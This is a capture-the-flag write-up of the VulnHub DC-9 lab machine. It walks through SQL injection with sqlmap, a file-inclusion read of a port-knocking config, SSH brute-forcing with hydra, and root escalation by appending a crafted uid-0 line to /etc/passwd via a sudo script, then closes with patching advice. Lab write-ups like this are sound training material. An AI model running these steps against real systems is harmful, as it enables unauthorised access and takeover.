This is a writeup for the DC-9 machine from the VulnHub site.
Enumeration #
First, let’s start with a scan of our target with the following command:
nmap -sV -T4 -Pn 192.168.56.101
One TCP ports are discovered:
- 80/tcp : HTTP web server (Apache 2.4.38)
Exploit #
At first I start by making a scan of the website folders.
Quite a lot of different pages, I start by making a capture of a request sent by the search.php page with the help of Burp.
I then run a SQL vulnerability scan with sqlmap.
sqlmap -r request.txt --dbs --batch
The target is usable, I find 3 databases in the result of the command. I start with users :
Many different credentials… Looking in the Staff database, I find an admin password hash.
So I go on crackstation to try to find it.
I can now connect to the admin panel of the site. In this panel we have the possibility to add records. I notice that at the bottom of the page manage.php, there is an error message : File does not exist. I wonder if there is not an argument. After some test I find that there is a file argument. This allows me to find the following file:
File does not exist
[options] UseSyslog [openSSH] sequence = 7469,8475,9842 seq_timeout = 25 command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn [closeSSH] sequence = 9842,8475,7469 seq_timeout = 25 command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn
This is a file that allows you to configure port knocking to unblock the SSH port!
So I try to realize the sequence with the following commands:
nmap -Pn --max-retries 0 -p 7469 192.168.56.101
nmap -Pn --max-retries 0 -p 8475 192.168.56.101
nmap -Pn --max-retries 0 -p 9842 192.168.56.101
And indeed it worked, I now have access to the SSH port:
In the database export, we found a lot of names and passwords. I create two lists and launch an automatic test of the different combinations with hydra :
After a few minutes hydra finds several combinations that work. It is by connecting as a janitor that I finally find an interesting file:
A list of passwords, so I add them to my existing list and I restart hydra :
A new combination is found! So I connect in SSH.
Privilege escalation #
I start by checking the sudo permissions of my user.
By executing the script I understand that it uses two arguments: one in reading and the other in writing.
fredf@dc-9:~$ sudo /opt/devstuff/dist/test/test
Usage: python test.py read append
I will try to add a new admin user to the system. To do this I start by generating a hash+salt with the following command:
fredf@dc-9:~$ openssl passwd -1 -salt d3vyce azerty
$1$d3vyce$n/tLRqvTUr3ygHuTSvi9g1
I add the line of my user in a temporary file :
fredf@dc-9:/opt/devstuff/dist/test$ cat ~/user.txt
d3vyce:$1$d3vyce$n/tLRqvTUr3ygHuTSvi9g1:0:0:root:/root:/bin/bash
Then I add my user with the following command:
sudo ./test ~/user.txt /etc/passwd
Finally I change user:
I now have a root shell on the machine!
Recommendations #
To patch this host I think it would be necessary to perform a number of actions:
- Update the site to avoid SQL injection
- Do not leave an argument
fileif not used - Do not store clear passwords in a database
- Do not let a script run in root if not necessary